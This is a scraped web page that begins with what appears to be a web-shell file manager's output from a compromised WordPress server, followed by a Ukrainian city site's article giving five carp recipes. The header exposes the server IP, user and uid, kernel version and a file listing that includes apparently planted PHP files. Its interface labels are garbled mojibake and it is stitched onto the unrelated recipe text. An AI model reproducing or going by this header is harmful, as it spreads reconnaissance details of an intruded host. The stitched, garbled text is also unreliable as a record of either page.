195.16.88.9 - Linux - whoami(krist287) - uid(1574) gid(1676)
kaylin

·

ϴΪ
ϼĿ¼ʱ޸ʱ
_.well-knownɾ 07552022-07-26 20:57:462022-04-19 08:48:45-
_ldɾ 07552022-07-26 20:55:402022-04-18 21:30:13-
_puɾ 07552022-08-12 22:04:542022-08-12 22:04:54-
doskaɾ 07552022-07-26 20:57:462022-05-13 00:21:36-
gboɾ 07552022-07-26 20:55:422022-04-21 16:29:19-
katalogɾ 07552022-07-26 20:55:422022-05-13 00:20:58-
nailɾ 07552022-07-26 20:55:502022-06-17 13:21:44-
testɾ 07552022-07-26 20:55:422022-04-18 15:34:19-
wakenɾ 07552022-08-11 02:53:342022-08-11 02:53:34-
wp-adminɾ 07552022-08-11 06:04:242022-08-11 06:04:24-
wp-contentɾ 07552022-08-13 05:16:232022-08-13 05:16:23-
wp-includesɾ 07552022-07-26 20:55:502022-04-18 17:42:24-
.htaccess 04442022-08-11 06:04:352022-08-11 06:04:3521.22 K
Damiendep 06442022-08-11 03:43:202022-08-11 03:43:209.20 K
fibber.php 06442022-08-11 01:48:402022-08-11 01:48:4016.68 K
google5f28cd50ed83a936.html 06442022-07-26 20:55:422022-04-24 10:15:3853 B
index.php 04442022-08-13 05:16:362022-04-18 20:09:526.33 K
license.txt 06442022-07-26 20:57:462022-04-18 20:09:5219.45 K
readme.html 06442022-07-26 20:55:502022-04-18 20:10:487.26 K
robots.txt 06442022-08-11 03:34:222022-08-11 03:34:22193 B
wp-activate.php 06442022-08-13 03:49:572022-04-18 20:09:527.00 K
wp-blog-header.php 06442022-08-12 19:04:052022-04-18 20:09:52351 B
wp-comments-post.php 06442022-07-26 20:55:502022-04-18 20:10:362.28 K
wp-config-sample.php 06442022-07-26 20:55:392022-04-18 20:10:482.93 K
wp-config.php 06442022-08-13 03:24:292022-04-18 20:09:523.69 K
wp-cron.php 06442022-08-13 05:15:372022-04-18 20:09:523.85 K
wp-links-opml.php 06442022-08-13 04:05:342022-04-18 20:09:522.44 K
wp-load.php 06442022-08-13 01:45:032022-04-18 20:09:523.81 K
wp-login.php 06442022-08-13 05:11:342022-04-18 20:09:5246.79 K
wp-mail.php 06442022-08-13 01:06:122022-04-18 20:09:528.38 K
wp-settings.php 06442022-07-26 20:55:502022-04-18 20:10:3622.49 K
wp-signup.php 06442022-08-13 01:28:282022-04-18 20:09:5231.21 K
wp-trackback.php 06442022-08-13 01:10:262022-04-18 20:09:524.64 K
wp.php 06442022-08-11 01:49:212022-08-11 01:49:21453 B
xmlrpc.php 06442022-08-13 05:11:072022-04-18 20:09:523.16 K
Ŀ¼[12] - ļ[23] - [0755]
Linux sr47.hostlife.net 3.10.0-962.3.2.lve1.5.49.el6h.x86_64 #1 SMP Thu Mar 4 07:40:03 EST 2021 x86_64
Apache/2
Що приготувати з коропа: ТОП-5 рецептів – Це Бориспіль – сайт міста Бориспіль
loader image
- Юна Українка подарувала Бориспільським кінологам «крилату конячку» яка виконує бажання. Днями, співробітники Кінологічного центру поліції Борисполя, які разом із ЗСУ та ТРО боронять рубежі Броварів, отримали цінний подарунок. Про це повідомляє прес-служба Кінологічного центру поліції в Київській області. Для наших відважних воїнів юна українка намалювала ліс, мирне небо та крилату конячку. За словами художниці, лоша здатне виконувати бажання. Варто лише доторкнутися до нього та подумати про те, чого хочеться найбільше. Картину юної мисткині передали на місце дислокації оборонців Берегині-волонтерки, які вже тривалий час докладають надлюдських зусиль аби забезпечувати воїнів усім необхідним. За бажанням авторки витвір потрапив саме до поліцейських кінологів. -
Меню Закрити

Що приготувати з коропа: ТОП-5 рецептів

/ 5. оценок:

Оценок пока нет. Поставьте оценку первым.

Карпа можна їсти у вареному, смаженому, запеченому вигляді. Через високий вміст жиру рекомендується готувати і подавати його з овочами, лимоном і зеленню.

Ми підготували для тебе 5 чудових рецептів з коропа, якими ти зможеш вразити свою кохану половинку.

1. Короп у кисло-солодкому соусі
Річкова риба, приготовлена в сметанно-томатному соусі з родзинками.

Короп у кисло-солодкому соусі

Інгредієнти на 4 порції:
– короп 600 г.
– лук 1/2 шт.
– корінь петрушки 1 шт.
– морква 1 шт.
– лавровий лист 1/2 шт.

Для підливи:
– борошно 1 ст.л.
– родзинки 2 ст.л.
– цукор 2 ст.л.
– вершкове масло 2 ст.л.
– томатне пюре 2 ст.л.
– лимонна кислота 1/2 г.
– бульйон 1 1/2 склянки.
– картопля 1 кг.

Спосіб приготування:
1. Очищеного коропа нарізати порційними шматками, покласти в сотейник, додати нарізану цибулю, моркву і петрушку, посолити, залити рибним бульйоном, звареним з плавників і голови коропа, або водою і тушкувати до готовності. Окремо відварити очищену картоплю.
2. Борошно просіяти, злегка обсмажити на маслі, розвести бульйоном, в якому тушився короп, додати злегка обсмажений на маслі томат, лимонну кислоту, розмішати, проварити і процідити.
3. Додати в підливу добре промитий ізюм, довести до кипіння і заправити цукром і вершковим маслом.
4. Перед подачею полити рибу і картоплю підливою.

2. Запечений короп з картоплею
Рецепт запеченої риби з овочами, грибами і картоплею.

Запечена риба з овочами, грибами і картоплею

Інгредієнти на 4 порції:
– короп 1 кг.
– картопля 3-4 шт.
– помідори 2 шт.
– печериці 200 г.
– лук 1 шт.
– морква 1 шт.
– лимон 1 шт.
– кріп 1 пучок.
– рослинне масло 2 ст.л.
– сіль, перець за смаком.

Спосіб приготування:
1. Випотрошеного і очищеного коропа натерти сіллю і перцем всередині і зовні. Начинити рибу третиною гілочок кропу.
2. Печериці помити і нарізати пластинками.
3. Цибулю нарізати кільцями, моркву та помідори – кружальцями, лимон і ретельно вимиту картоплю – скибочками.
4. У центр змащеної маслом форми для запікання покласти залишки кропу. З боків викласти овочі з грибами і лимоном.
5. Зверху на кріп викласти рибу. Скропити рибу рослинним маслом і приправити за смаком.
6. Поставити в попередньо нагріту духовку до 180 градусів. Запікати 20 хвилин, потім збільшити температуру до 200-220 тримати в духовці до готовності.

3. Короп, смажений в сметані
Рецепт смаженого коропа в сметані для мультиварки.

Смажений короп в сметані

Інгредієнти на 2 порції:
– короп 1 шт.
– борошно 2 ст.л.
– сметана 200г.
– рослинне масло 2 ст.л.
– сіль за смаком.

Спосіб приготування:
1. Карпа випатрати, видалити луску, відрізати плавники. З голови видалити зябра.
2. Ретельно вимити й обсушити.
3. Посолити і обваляти в борошні.
4. У чашу мультиварки налити масло, викласти коропа і включити програму “Підсмажування” на 20 хвилин. Рівномірно обсмажити коропа з обох сторін.
5. По закінченню програми залити коропа сметаною і включити програму “Мультіповар”, задати температуру 100 градусів на 15 хвилин.

Порада: подавати з смаженою картоплею або гречаною кашею з зеленим салатом.

4. Запечений короп з грибами та цибулею
Простий рецепт запеченої річкової риби з печерицями та цибулею.

Запечена річкова риба з печерицями та цибулею

Інгредієнти на 2 порції:
– короп 1 шт.
– печериці 300 г.
– ріпчаста цибуля 2 шт.
– сіль, перець за смаком.
– рослинне масло за смаком.

Спосіб приготування:
1. Випатрати і почистити рибу, добре помити. Натерти сіллю і перцем.
2. Налити на деко рослинне масло, викласти гриби, нарізані пластинками, і кільця цибулі.
3. Зверху покласти рибу і відправити в розігріту до 180 градусів духовку на 30-40 хвилин.

5. Короп у кисло-солодкому соусі
Кисло-солодкий соус зазвичай асоціюється з приготуванням свинини.

Спробуй приготувати таким чином звичайного коропа і він розкриється перед тобою з абсолютно несподіваної, китайської сторони.

Короп у кисло-солодкому соусі

Інгредієнти:
– охолоджене філе коропа на шкірі 400 г.
– соняшникова олія 180 мл.
– кисло-солодкий соус 100 г.
– рисове вино 15 г.
– кукурудзяний крохмаль 40 г.
– кедрові горіхи 12 г.
– салат листовий 10 г.
– сіль за смаком.

Спосіб приготування:
Філе коропа на шкірці надрізаємо кубиками, заливаємо рисовим вином, додаємо сіль і маринуємо 20 хвилин. Замариновану рибу обвалюють у крохмалі. Обсмажуємо рибу у великій кількості олії до золотистої скоринки. Кисло-солодкий соус розігріваємо на сковорідці і поливаємо гарячим соусом рибу. Посипаємо коропа кедровими горішками. Подаємо коропа з листям салату.

Переглядів:: 16
Share on facebook
Share on telegram
Share on twitter
guest
0 коментарiв
Межтекстовые Отзывы
Посмотреть все комментарии
Авторизація
*
*
Генерація паролю
0
Оставьте комментарий! Напишите, что думаете по поводу статьи.x
()
x